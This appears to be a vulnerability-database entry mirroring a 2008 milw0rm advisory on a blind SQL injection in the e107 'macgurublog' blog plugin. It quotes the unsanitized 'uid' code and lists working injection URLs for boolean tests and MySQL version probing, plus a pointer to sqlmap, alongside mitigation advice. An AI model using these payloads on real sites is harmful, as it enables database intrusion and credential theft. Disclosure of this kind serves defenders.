e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability

vendor:

macgurublog_menu

by:

Virangar Security Team

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: macgurublog_menu

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: NO

Related CWE: N/A

CPE: e107:macgurublog_menu:2.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability

The vulnerability exists in the macgurublog.php file, where the user_id parameter is not properly sanitized before being used in a SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable application. This can allow an attacker to gain access to sensitive information from the database, such as user credentials.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

##################################################################################################
  #                                                                                                #
  # ::e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability::       #
  #                                                                                                #          
  ##################################################################################################

Virangar Security Team

www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)

-------vuln codes in:-----------
macgurublog.php:
line 18:$buid = $_GET['uid'];
..
..
line 31:$sql -> db_Select("user", "user_name", "user_id=".$buid);
---
exploit:
[-]note=becuse e107 using diffrent prefix/table names it's impossible to writting exploit for it :(

http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 2>1/*   #the page fully loaded

http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 1>3/*   #page loaded whit any data and some error that say "The user has hidden their blog."

cheking the mysql version:
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=5
or
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=4

# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
---
young iranian h4ck3rz

# milw0rm.com [2008-05-22]